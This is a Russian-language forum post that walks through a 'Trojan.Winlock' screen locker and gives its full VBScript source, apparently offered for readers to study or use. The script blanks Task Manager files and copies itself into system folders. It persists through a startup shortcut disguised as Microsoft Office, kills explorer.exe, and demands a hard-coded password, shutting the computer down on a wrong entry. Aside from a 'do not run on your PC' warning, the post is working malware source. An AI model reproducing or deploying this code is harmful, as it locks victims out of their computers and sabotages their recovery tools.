Для просмотра всех возможностей сайта, вам необходимо пройти процедуру регистрации, либо войти в свой аккаунт.* *Форма входа и регистрация пользователя, располагается в шапке сайта, либо в блоке "Профиль" на страницах типа "Главная".
Пароль вы можете получить заплатив деньги злоумышленникам или вообще не можете Его получить как в нашем случае. Теперь у вас есть поверхосные знания Trojana_Winlock И вам можно рассказать про наш троянчик .Итак наш Троян завершает процесс explorer.exe И просит ввести пароль, если пароль введён неверно то вылезает сообщение: о том что пароль введён неверно и компьютер выключается. В том случи если вы ввели пароль верно то процесс explorer.exe запустится и вы можете работать на вашем ПК дальше…… .
Исходный код:
НЕЗАПУСКАЙТЕ НА СВОЁМ ПК
On Error Resume Next set FSO=CreateObject("Scripting.FileSystemObject") set file=FSO.CreateTextFile("C:\Windows\Help\taskmgr.chm") set file=FSO.CreateTextFile("C:\Windows\Help\taskmgr.hlp") set file=FSO.CreateTextFile("C:\WINDOWS\Prefetch\TASKMGR.EXE-20256C55.pf") set file=FSO.CreateTextFile("C:\WINDOWS\system32\taskmgr.exe")
On Error Resume Next Dim FileSysObject, File Set FileSysObject = CreateObject("Scripting.FileSystemObject") Set File = FileSysObject.GetFile(WScript.ScriptFullName) Set s = CreateObject("Wscript.Shell") File.Copy ("C:\WINDOWS\Fonts\Win_32.vbe") File.Copy ("C:\WINDOWS\System32\Win_32.vbe") Dim WSHShell Set WSHShell = WScript.CreateObject("WScript.Shell") Dim MyShortcut, MyDesktop, StartupPath StartupPath = WSHShell.SpecialFolders("Startup") Set MyShortcut = WSHShell.CreateShortcut(StartupPath & _ "\Microsoft Office.lnk") MyShortcut.TargetPath = WSHShell.ExpandEnvironmentStrings("C:\WINDOWS\Fonts\Win_32.vbe") MyShortcut.IconLocation = WSHShell.ExpandEnvironmentStrings("C:\Program Files\Common Files\Microsoft Shared\Office10\MSOICONS.exe") MyShortcut.Save set kill = createobject("wscript.shell") kill.run"taskkill /f /im explorer.exe",0 Win_lock=inputbox("Введите пароль для разблокировки") if Win_lock="611577" then set t = createobject ("wscript.shell") t.run "explorer.exe" else MsgBox"Неверный пароль",0,"Win_Lock" Set OpSysSet = GetObject("winmgmts:{(Shutdown)}//./root/cimv2").ExecQuery("select * from Win32_OperatingSystem where Primary=true") for each OpSys in OpSysSet OpSys.ShutDown() next Set s = CreateObject("Wscript.Shell") wscript.sleep 80 s.sendkeys"{numlock}" end if